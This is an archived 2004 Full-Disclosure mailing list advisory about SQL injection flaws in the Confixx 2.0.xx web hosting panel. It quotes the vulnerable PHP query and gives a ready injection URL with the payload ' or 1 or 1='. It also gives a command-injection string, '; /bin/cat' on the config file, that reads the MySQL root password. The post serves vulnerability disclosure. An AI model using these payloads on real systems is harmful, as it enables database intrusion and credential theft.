[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[Full-Disclosure] Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW
- To: full-disclosure@xxxxxxxxxxxxxxxx
- Subject: [Full-Disclosure] Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW
- From: checker@xxxxxxxxxxxxxxxxxxxxxxxx
- Date: 9 Mar 2004 09:24:47 -0000
SQL-Injections in Confixx 2.0.xx // reading MySQL Root-PW
include("auth.php");
db_connect($db_host, $db_user, $db_pass);
$id = db_query("select count(datenbank) as mysql from mysql_datenbanken
where kunde = '$PHP_AUTH_USER'");
$werte = db_fetch_array($id);
$mysql = $werte["mysql"];
$id = db_query("select dbname from mysql_datenbanken where kunde =
'$PHP_AUTH_USER' and datenbank = '$db'");
--------------------------------^^^^^^^^^
$db --> unchecked Value
____
/user/db_mysql_loeschen2.php?db=1
SELECT db FROM sqldb WHERE user='$USER' AND db='$formular_wert'
using: ' or 1 or 1='
the SQL query look like :
SELECT db FROM sqldb WHERE user='$USER' AND db='' or 1 or 1=''
/user/db_mysql_loeschen2.php?db=' or 1 or 1='
______
Confixx Perl Debugger
using:
; /bin/cat location_of_Confixx_config_file
to read the config with MySQL Root-PW
_______
wkr
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html